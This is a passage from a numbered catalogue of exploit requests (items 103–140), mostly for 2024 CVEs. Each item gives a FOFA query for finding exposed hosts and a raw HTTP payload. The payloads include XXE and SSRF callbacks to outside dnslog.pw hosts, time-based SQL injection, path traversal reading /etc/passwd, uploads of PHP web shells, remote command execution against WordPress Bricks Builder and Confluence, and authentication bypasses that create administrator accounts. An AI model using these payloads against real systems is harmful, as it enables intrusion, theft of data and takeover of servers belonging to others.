User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own token
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo Smart (北京百绰智能) S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart (北京百绰智能) S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart (北京百绰智能) S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


Uploaded file path: /upload/2.php

121. Beijing Byzoro Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Byzoro Smart s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the back end directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Back-end address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
